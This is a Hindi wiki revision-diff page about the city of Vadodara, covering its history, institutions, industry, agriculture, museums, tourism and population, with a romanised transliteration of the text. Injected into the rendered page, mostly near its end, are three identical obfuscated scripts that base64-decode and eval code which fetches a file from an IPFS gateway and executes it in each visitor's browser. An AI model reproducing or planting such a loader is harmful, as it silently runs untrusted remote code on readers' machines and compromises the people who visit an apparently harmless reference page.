Difference between revisions of "वड़ोदरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
(8 intermediate revisions by 5 users not shown)
Line 1: Line 1:
 
'''बड़ोदरा / बड़ौदा''' <br />
 
'''बड़ोदरा / बड़ौदा''' <br />
 
[[चित्र:Statue-Gandhi.jpg|thumb|220px|[[महात्मा गाँधी]] जी की प्रतिमा]]
 
[[चित्र:Statue-Gandhi.jpg|thumb|220px|[[महात्मा गाँधी]] जी की प्रतिमा]]
वड़ोदरा [[गुजरात]] का एक महत्त्वपूर्ण नगर है। वड़ोदरा शहर, वडोदरा ज़िले का प्रशासनिक मुख्यालय, पूर्वी-मध्य [[गुजरात]] राज्य, पश्चिम [[भारत]], [[अहमदाबाद]] के दक्षिण-पूर्व में विश्वामित्र नदी के तट पर स्थित है। वडोदरा को बड़ौदा भी कहते हैं। इसका सबसे पुराना उल्लेख 812 ई. के अधिकारदान या राजपात्र में है, जिसमें इसे वादपद्रक बताया गया है। यह अंकोत्तका शहर से संबद्ध बस्ती थी। इस क्षेत्र को जैनियों से छीनने वाले दोर राजपूत राजा चंदन के नाम पर शायद इसे चंदनवाटी के नाम से भी जाना जाता था। समय-समय पर इस शहर के नए नामकरण होते रहे, जैसे वारावती, वातपत्रक, बड़ौदा और [[1971]] में वडोदरा।  
+
वड़ोदरा [[गुजरात]] का एक महत्त्वपूर्ण नगर है। वड़ोदरा शहर, वडोदरा ज़िले का प्रशासनिक मुख्यालय, पूर्वी-मध्य [[गुजरात]] राज्य, पश्चिम [[भारत]], [[अहमदाबाद]] के दक्षिण-पूर्व में विश्वामित्र नदी के [[तट]] पर स्थित है। वडोदरा को बड़ौदा भी कहते हैं। इसका सबसे पुराना उल्लेख 812 ई. के अधिकारदान या राजपात्र में है, जिसमें इसे वादपद्रक बताया गया है। यह अंकोत्तका शहर से संबद्ध बस्ती थी। इस क्षेत्र को जैनियों से छीनने वाले दोर राजपूत राजा चंदन के नाम पर शायद इसे चंदनवाटी के नाम से भी जाना जाता था। समय-समय पर इस शहर के नए नामकरण होते रहे, जैसे वारावती, वातपत्रक, बड़ौदा और [[1971]] में वडोदरा।  
 
==इतिहास==
 
==इतिहास==
वडोदरा के इतिहास को हिंदू काल (1297 तक ), [[दिल्ली]] की मुस्लिम सल्तनत के अधीन काल (1297 से लगभग 1401), स्वतंत्र [[गुजरात]] सल्तनत जिसके दौरान वर्तमान शहर के केंद्र की स्थापना हुई (लगभग 1401 से लगभग 1573), [[मुगल काल|मुग़ल साम्राज्य]] का काल (लगभग 1573 -1734) और [[मराठा साम्राज्य|मराठा काल]], जिसके दौरान यह शक्तिशाली गायकवाड़ परिवार की राजधानी बना (1734 -[[1947]]), में विभक्त किया जा सकता है। अंग्रेज़ों ने [[ईस्ट इंडिया कंपनी]] और गायकवाड़ शासकों के संबंधों को सुचारु बनाए रखने के लिए 1802 में इस शहर में रेज़िडेंसी की स्थापना की, बाद में यह [[गुजरात]] तथा [[काठियावाड़]] प्रायद्वीप के सभी राज्यों के साथ [[अंग्रेज़|अंग्रेज़ों]] के संबंधों के लिए ज़िम्मेदार रहा। [[मराठा|मराठों]] ने 1706 ई. में बड़ौदा पर आक्रमण करके इसे लूटा। दामाजी गायकवाड़ (1732 -1768 ई.) ने बड़ौदा रियासत की नींव रखी और बड़ौदा को गायकवाड़ों की राजधानी बनाया। दामाजी ने यहाँ अनेक भव्य इमारतों का निर्माण करवाया, जिससे शहर का आकर्षण बढ़ा।
+
वडोदरा के इतिहास को हिन्दू काल (1297 तक), [[दिल्ली]] की मुस्लिम सल्तनत के अधीन काल (1297 से लगभग 1401), स्वतंत्र [[गुजरात]] सल्तनत जिसके दौरान वर्तमान शहर के केंद्र की स्थापना हुई (लगभग 1401 से लगभग 1573), [[मुग़ल काल|मुग़ल साम्राज्य]] का काल (लगभग 1573 -1734) और [[मराठा साम्राज्य|मराठा काल]], जिसके दौरान यह शक्तिशाली [[गायकवाड़]] परिवार की राजधानी बना (1734 -[[1947]]), में विभक्त किया जा सकता है। अंग्रेज़ों ने [[ईस्ट इंडिया कंपनी]] और गायकवाड़ शासकों के संबंधों को सुचारु बनाए रखने के लिए 1802 में इस शहर में रेज़िडेंसी की स्थापना की, बाद में यह [[गुजरात]] तथा [[काठियावाड़]] प्रायद्वीप के सभी राज्यों के साथ [[अंग्रेज़|अंग्रेज़ों]] के संबंधों के लिए ज़िम्मेदार रहा।[[चित्र:Laxmi-Vilas-Palace-Vadadora.jpg|thumb|220px|left|लक्ष्मी विलास पैलेस, वड़ोदरा]] [[मराठा|मराठों]] ने 1706 ई. में बड़ौदा पर आक्रमण करके इसे लूटा। [[दामाजी गायकवाड़]] (1732 -1768 ई.) ने बड़ौदा रियासत की नींव रखी और बड़ौदा को गायकवाड़ों की राजधानी बनाया। दामाजी ने यहाँ अनेक भव्य इमारतों का निर्माण करवाया, जिससे शहर का आकर्षण बढ़ा।
[[चित्र:Laxmi-Vilas-Palace-Vadadora.jpg|thumb|220px|लक्ष्मी विलास पैलेस, वड़ोदरा<br />Laxmi Vilas Palace, Vadodara]]
 
 
 
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
 
वडोदरा का लंबा इतिहास इसके कई महलों, द्वारों, उद्यानों और मार्गों से परिलक्षित होता है। यहाँ महाराजा सयाजीराव यूनिवर्सिटी ऑफ़ बड़ौदा ([[1949]]) तथा अन्य शैक्षणिक व सांस्कृतिक संस्थान हैं, जिनमें इंजीनियरिंग संकाय, मेडिकल कॉलेज वडोदरा होमियोपैथिक मेडिकल कॉलेज, वडोदरा बायोइंफ़ॉर्मेटिक्स सेंटर, कला भवन तथा कई संग्रहालय शामिल हैं।  
 
वडोदरा का लंबा इतिहास इसके कई महलों, द्वारों, उद्यानों और मार्गों से परिलक्षित होता है। यहाँ महाराजा सयाजीराव यूनिवर्सिटी ऑफ़ बड़ौदा ([[1949]]) तथा अन्य शैक्षणिक व सांस्कृतिक संस्थान हैं, जिनमें इंजीनियरिंग संकाय, मेडिकल कॉलेज वडोदरा होमियोपैथिक मेडिकल कॉलेज, वडोदरा बायोइंफ़ॉर्मेटिक्स सेंटर, कला भवन तथा कई संग्रहालय शामिल हैं।  
====<u>कलाकृतियाँ</u>====
+
==उद्योग==
 +
[[चित्र:Kirti-Mandir-Vadodara.jpg|thumb|कीर्ति मंदिर, वडोदरा]]
 +
इस शहर में उत्पादित होने वाली विभिन्न प्रकार की वस्तुओं में [[सूती वस्त्र उद्योग|सूती वस्त्र]] तथा हथकरघा [[वस्त्र]], रसायन, [[दियासलाई]], मशीनें और फ़र्नीचर शामिल हैं।
  
इस शहर का एक प्रमुख स्थान बड़ौदा संग्रहालय और चित्र दीर्घा है, जिसकी स्थापना बड़ौदा के महाराजा गायकवाड़ ने 1894 में उत्कृष्ट कलाकृतियों के प्रतिनिधि संग्रह के रूप में की थी। इसके भवन का निर्माण [[1908]] से [[1914]] के बीच हुआ और औपचारिक रूप से [[1921]] में दीर्घा का उद्घाटन हुआ। इस संग्रहालय में यूरोपीय चित्र, विशेषकर जॉर्ज रोमने के इंग्लिश रूपचित्र, सर जोशुआ रेनॉल्ड्स तथा सर पीटर लेली की शैलियों की कृतियाँ और भारतीय पुस्तक चित्र, मूर्तिशिल्प, लोक कला, वैज्ञानिक वस्तुएँ व मानव जाति के वर्णन से संबंधित वस्तुएँ प्रदर्शित की गई हैं। यहाँ इतालवी, स्पेनिश, डच और फ्लेमिश कलाकारों की कृतियाँ भी रखी गई हैं।
+
==परिवहन==
[[चित्र:Museum-Vadodara.jpg|thumb|220px|वड़ोदरा संग्रहालय<br />Vadodara Museum]]
 
====<u>उद्योग</u>====
 
इस शहर में उत्पादित होने वाली विभिन्न प्रकार की वस्तुओं में सूती वस्त्र तथा हथकरघा वस्त्र, रसायन, दियासलाई, मशीनें और फ़र्नीचर शामिल हैं।
 
 
 
====<u>परिवहन</u>====
 
 
वडोदरा एक रेल और मार्ग जंक्शन है तथा यहाँ एक हवाई अड्डा भी है।  
 
वडोदरा एक रेल और मार्ग जंक्शन है तथा यहाँ एक हवाई अड्डा भी है।  
  
====<u>कृषि</u>====
+
==कृषि==
वडोदरा ज़िला 7,788 वर्ग किमी में फैला हुआ है, जो [[नर्मदा नदी]] (दक्षिण) से [[माही नदी]] (उत्तर) तक विस्तृत है। यह लगभग पूर्व बड़ौदा रियासत (गायकवाड़ राज्य के) की राजधानी के क्षेत्र या ज़िले के बराबर ही है। कपास, तंबाकू तथा एरंड की फलियाँ यहाँ की नक़दी फ़सलें हैं। स्थानीय उपयोग और निर्यात के लिए [[गेहूँ]], दलहन, मक्का, [[चावल]], तथा बाग़ानी फ़सलें उगाई जाती हैं।
+
[[वडोदरा ज़िला]] 7,788 वर्ग किमी में फैला हुआ है, जो [[नर्मदा नदी]] (दक्षिण) से [[माही नदी]] (उत्तर) तक विस्तृत है। यह लगभग पूर्व बड़ौदा रियासत ([[गायकवाड़]] राज्य के) की राजधानी के क्षेत्र या ज़िले के बराबर ही है। [[कपास]], [[तंबाकू]] तथा एरंड की फलियाँ यहाँ की नक़दी फ़सलें हैं। स्थानीय उपयोग और निर्यात के लिए [[गेहूँ]], दलहन, [[मक्का]], [[चावल]], तथा बाग़ानी फ़सलें उगाई जाती हैं।
 +
==पर्यटन==
 +
बाग़-बगीचों, महलों-मन्दिरों आदि का शहर वडोदरा प्राचीन काल में बड़ोदा के नाम से जाना जाता था। एक समय [[मराठा|मराठों]] व गायकवाड [[राजपूत|राजपूतों]] की राजधानी रहा यह शहर आज एक औद्योगिक क्षेत्र के रूप में प्रसिद्ध है। महलों के इस शहर में ख़ूबसूरत प्राचीन हवेलियाँ, महल, बाग़-बागीचें, मन्दिर-मस्जिद व विभिन्न बाज़ार देखे जा सकते है। वर्तमान में अपने विश्वविद्यालय व फाईन आर्ट्स फैक्लटी के लिए प्रसिद्ध वडोदरा में बच्चों व बड़ों दोनों के आकर्षण का केन्द्र सयाजी उद्यान शहर का मुख्य पर्यटन स्थल है। [[चित्र:Museum-Vadodara.jpg|thumb|250px|left|वड़ोदरा संग्रहालय]] इस उद्यान में चिड़ियाघर, संग्रहालय व टायट्रोन के अतिरिक्त पूरे [[एशिया]] में अपनी किस्म का प्रथम सरदार वल्लभ भाई प्लेनिटोरियम दर्शनीय है। लक्ष्मीविलास पैलेस सन 1890 ई. में शाही परिवार के लिए महाराज संयाजी राव तृतीय ने बनवाया था। इसी परिसर में एक और संग्रहालय- फतेहसिंह राव संग्रहालय सन [[1961]] मे एक निजी ट्रस्ट द्वारा स्थापित किया गया था। इसमें ग्रीक, रोम व यूरोप आदि देशों की [[मूर्तिकला]] का अध्ययन किया जा सकता है। [[राजा रवि वर्मा|रवि वर्मा]] के तैलचित्र इस संग्रहालय का एक और आकर्षण है। शहर में ही अंतर्राष्ट्रीय ख्याति प्राप्त बड़ौदा संग्रहालय व कला दीर्घा (पिक्चर गैलरि) संयाजी राव तृतीय द्वारा सन 1887 में स्थापित इस संग्रहालय में सन 1914 में पिक्चर गैलरि बनवाई गई लेकिन जनता के लिए यह गैलरी 1921 में खोली गई। यहाँ राष्ट्रीय व अंतर्राष्ट्रीय संस्कृति व सभ्याताओं का बेजोड़ संग्रह देखा जा सकता है।
 +
====कलाकृतियाँ====
 +
इस शहर का एक प्रमुख स्थान बड़ौदा संग्रहालय और चित्र दीर्घा है, जिसकी स्थापना बड़ौदा के महाराजा [[गायकवाड़]] ने 1894 में उत्कृष्ट कलाकृतियों के प्रतिनिधि संग्रह के रूप में की थी। इसके भवन का निर्माण [[1908]] से [[1914]] के बीच हुआ और औपचारिक रूप से [[1921]] में दीर्घा का उद्घाटन हुआ। इस संग्रहालय में यूरोपीय चित्र, विशेषकर जॉर्ज रोमने के इंग्लिश रूपचित्र, सर जोशुआ रेनॉल्ड्स तथा सर पीटर लेली की शैलियों की कृतियाँ और भारतीय पुस्तक चित्र, मूर्तिशिल्प, लोक कला, वैज्ञानिक वस्तुएँ व मानव जाति के वर्णन से संबंधित वस्तुएँ प्रदर्शित की गई हैं। यहाँ इतालवी, स्पेनिश, डच और फ्लेमिश कलाकारों की कृतियाँ भी रखी गई हैं।  
  
 
==जनसंख्या==
 
==जनसंख्या==
 
[[2001]] की जनगणना के अनुसार वड़ोदरा शहर की जनसंख्या 13,06,035 व ज़िले की कुल जनसंख्या 36,39,775 है।   
 
[[2001]] की जनगणना के अनुसार वड़ोदरा शहर की जनसंख्या 13,06,035 व ज़िले की कुल जनसंख्या 36,39,775 है।   
 
   
 
   
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 32: Line 30:
 
|शोध=
 
|शोध=
 
}}
 
}}
 
+
==वीथिका==
{{संदर्भ ग्रंथ}}
+
<gallery>
 +
चित्र:Laxmi-Vilas-Palace-Vadadora-1.jpg|लक्ष्मी विलास पैलेस, वड़ोदरा
 +
चित्र:Laxmi-Vilas-Palace-Vadadora-2.jpg|लक्ष्मी विलास पैलेस, वड़ोदरा
 +
चित्र:Jami-Masjid-Vadodara.jpg|जामी मस्जिद, वड़ोदरा
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 12:05, 11 August 2017

b dodara / b dauda
[[chitr:Statue-Gandhi.jpg|thumb|220px|mahatma gaandhi ji ki pratima]] v dodara gujarat ka ek mahattvapoorn nagar hai. v dodara shahar, vadodara zile ka prashasanik mukhyalay, poorvi-madhy gujarat rajy, pashchim bharat, ahamadabad ke dakshin-poorv mean vishvamitr nadi ke tat par sthit hai. vadodara ko b dauda bhi kahate haian. isaka sabase purana ullekh 812 ee. ke adhikaradan ya rajapatr mean hai, jisamean ise vadapadrak bataya gaya hai. yah aankottaka shahar se sanbaddh basti thi. is kshetr ko jainiyoan se chhinane vale dor rajapoot raja chandan ke nam par shayad ise chandanavati ke nam se bhi jana jata tha. samay-samay par is shahar ke ne namakaran hote rahe, jaise varavati, vatapatrak, b dauda aur 1971 mean vadodara.

itihas

vadodara ke itihas ko hindoo kal (1297 tak), dilli ki muslim saltanat ke adhin kal (1297 se lagabhag 1401), svatantr gujarat saltanat jisake dauran vartaman shahar ke keandr ki sthapana huee (lagabhag 1401 se lagabhag 1573), mugal samrajy ka kal (lagabhag 1573 -1734) aur maratha kal, jisake dauran yah shaktishali gayakava d parivar ki rajadhani bana (1734 -1947), mean vibhakt kiya ja sakata hai. aangrezoan ne eest iandiya kanpani aur gayakava d shasakoan ke sanbandhoan ko sucharu banae rakhane ke lie 1802 mean is shahar mean rezideansi ki sthapana ki, bad mean yah gujarat tatha kathiyava d prayadvip ke sabhi rajyoan ke sath aangrezoan ke sanbandhoan ke lie zimmedar raha.thumb|220px|left|lakshmi vilas pailes, v dodara marathoan ne 1706 ee. mean b dauda par akraman karake ise loota. damaji gayakava d (1732 -1768 ee.) ne b dauda riyasat ki nianv rakhi aur b dauda ko gayakava doan ki rajadhani banaya. damaji ne yahaan anek bhavy imaratoan ka nirman karavaya, jisase shahar ka akarshan badha.

shikshan sansthan

vadodara ka lanba itihas isake kee mahaloan, dvaroan, udyanoan aur margoan se parilakshit hota hai. yahaan maharaja sayajirav yoonivarsiti aauf b dauda (1949) tatha any shaikshanik v saanskritik sansthan haian, jinamean ianjiniyariang sankay, medikal k aaulej vadodara homiyopaithik medikal k aaulej, vadodara bayoianf aaurmetiks seantar, kala bhavan tatha kee sangrahalay shamil haian.

udyog

thumb|kirti mandir, vadodara is shahar mean utpadit hone vali vibhinn prakar ki vastuoan mean sooti vastr tatha hathakaragha vastr, rasayan, diyasalaee, mashinean aur farnichar shamil haian.

parivahan

vadodara ek rel aur marg jankshan hai tatha yahaan ek havaee adda bhi hai.

krishi

vadodara zila 7,788 varg kimi mean phaila hua hai, jo narmada nadi (dakshin) se mahi nadi (uttar) tak vistrit hai. yah lagabhag poorv b dauda riyasat (gayakava d rajy ke) ki rajadhani ke kshetr ya zile ke barabar hi hai. kapas, tanbakoo tatha erand ki phaliyaan yahaan ki naqadi fasalean haian. sthaniy upayog aur niryat ke lie gehooan, dalahan, makka, chaval, tatha bagani fasalean ugaee jati haian.

paryatan

bag-bagichoan, mahaloan-mandiroan adi ka shahar vadodara prachin kal mean b doda ke nam se jana jata tha. ek samay marathoan v gayakavad rajapootoan ki rajadhani raha yah shahar aj ek audyogik kshetr ke roop mean prasiddh hai. mahaloan ke is shahar mean khoobasoorat prachin haveliyaan, mahal, bag-bagichean, mandir-masjid v vibhinn bazar dekhe ja sakate hai. vartaman mean apane vishvavidyalay v phaeen arts phaiklati ke lie prasiddh vadodara mean bachchoan v b doan donoan ke akarshan ka kendr sayaji udyan shahar ka mukhy paryatan sthal hai. thumb|250px|left|v dodara sangrahalay is udyan mean chi diyaghar, sangrahalay v tayatron ke atirikt poore eshiya mean apani kism ka pratham saradar vallabh bhaee plenitoriyam darshaniy hai. lakshmivilas pailes san 1890 ee. mean shahi parivar ke lie maharaj sanyaji rav tritiy ne banavaya tha. isi parisar mean ek aur sangrahalay- phatehasianh rav sangrahalay san 1961 me ek niji trast dvara sthapit kiya gaya tha. isamean grik, rom v yoorop adi deshoan ki moortikala ka adhyayan kiya ja sakata hai. ravi varma ke tailachitr is sangrahalay ka ek aur akarshan hai. shahar mean hi aantarrashtriy khyati prapt b dauda sangrahalay v kala dirgha (pikchar gailari) sanyaji rav tritiy dvara san 1887 mean sthapit is sangrahalay mean san 1914 mean pikchar gailari banavaee gee lekin janata ke lie yah gailari 1921 mean kholi gee. yahaan rashtriy v aantarrashtriy sanskriti v sabhyataoan ka bejo d sangrah dekha ja sakata hai.

kalakritiyaan

is shahar ka ek pramukh sthan b dauda sangrahalay aur chitr dirgha hai, jisaki sthapana b dauda ke maharaja gayakava d ne 1894 mean utkrisht kalakritiyoan ke pratinidhi sangrah ke roop mean ki thi. isake bhavan ka nirman 1908 se 1914 ke bich hua aur aupacharik roop se 1921 mean dirgha ka udghatan hua. is sangrahalay mean yooropiy chitr, visheshakar j aaurj romane ke ianglish roopachitr, sar joshua ren aaulds tatha sar pitar leli ki shailiyoan ki kritiyaan aur bharatiy pustak chitr, moortishilp, lok kala, vaijnanik vastuean v manav jati ke varnan se sanbandhit vastuean pradarshit ki gee haian. yahaan italavi, spenish, dach aur phlemish kalakaroan ki kritiyaan bhi rakhi gee haian.

janasankhya

2001 ki janaganana ke anusar v dodara shahar ki janasankhya 13,06,035 v zile ki kul janasankhya 36,39,775 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>